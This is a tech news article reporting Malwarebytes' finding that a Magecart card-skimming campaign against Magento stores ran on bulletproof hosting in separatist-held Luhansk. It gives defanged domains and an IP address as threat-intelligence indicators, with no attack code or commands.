View all newsletters
Receive our newsletter - data, insights and analysis delivered to you

This Malware is Being Served from a War Zone

"We also discovered a tar.gz archive containing the usernames and passwords needed to login into hundreds of Magento sites"

By CBR Staff Writer

Cybersecurity company Malwarebytes says it has traced the host servers of a Magecart card skimming campaign to the so-called “independent Donetsk and Luhansk People’s Republics (D/LPR)” in eastern Ukraine: site of a festering war that has resulted in over 13,000 deaths to date.

So-called “bulletproof hosting” (hosting services resilient to law enforcement takedowns) are nothing new, but locating them in what is effectively a war zone put a unique twist on the offering.

Malware War Zone: More than a Metaphor 

The area has been the site of a bitter conflict after local militia seized government buildings in Donetsk, Luhansk and Kharkiv in early 2014, declared the independence of “people’s republics”, and called referenda on joining Russia, which they scheduled for 11 May. Russia, however, never recognised the statelets, although it covertly sent troops to bolster their defence against Ukrainian efforts to retake them.

The cybercriminals are using servers advertised as being in a “private Luhansk data center”.

They are using autonomous system AS58271 “FOP Gubina Lubov Petrivna”, which describe as a “hotspot for IDN-based phishing, in particular around cryptocurrency assets”.

Malwarebytes’ threat intelligence team said they identified the host server location after investigating a Magecart campaign that was using a skimmer injected into compromised Magento sites and trying to pass itself for Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Read this: Magecart Launches “Spray and Pray” Attacks on AWS S3 Buckets, Hits 17,000

Sniffing about the hosting servers, the security team found that each online store hacked as part of the campaign had its own skimmer, and identified a file detailing hundreds of affected ecommerce sites, replete with passwords.

Content from our partners
Green for go: Transforming trade in the UK
Manufacturers are switching to personalised customer experience amid fierce competition
How many ends in end-to-end service orchestration?

They said: “We also discovered a tar.gz archive perhaps left behind by mistake containing the usernames and passwords needed to login into hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

“Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt).”

The criminals were using another Google lookalike site (google.ssl.lnfo[.]cc, to exfiltrate the card details they stole. (Magecart typically work via the insertion of a customized Javascript payment overlay for the specific site; allowing the “hackers” – often such sites are insecure: recent campaigns have involved dropping skimmers en masse in .js files in open AWS S3 buckets – to capture personal information and card details).

The “no-mans-land” status of the self-proclaimed republics makes them an ideal site for cybercriminals to host servers in: the host service for the sites being used in this particular campaign are being offered online by bproof[.]host at 176.119.1[.]89, which advertises “bulletproof IT services with VPS and dedicated servers”.

See also: Chinese Hackers Dropped Rootkit in 50,000 Servers: Then Left Theirs Wide Open

Websites in our network
Select and enter your corporate email address Tech Monitor's research, insight and analysis examines the frontiers of digital transformation to help tech leaders navigate the future. Our Changelog newsletter delivers our best work to your inbox every week.
  • CIO
  • CTO
  • CISO
  • CSO
  • CFO
  • CDO
  • CEO
  • Architect Founder
  • MD
  • Director
  • Manager
  • Other
Visit our privacy policy for more information about our services, how New Statesman Media Group may use, process and share your personal data, including information on your rights in respect of your personal data and how you can unsubscribe from future marketing communications. Our services are intended for corporate subscribers and you warrant that the email address submitted is your corporate email address.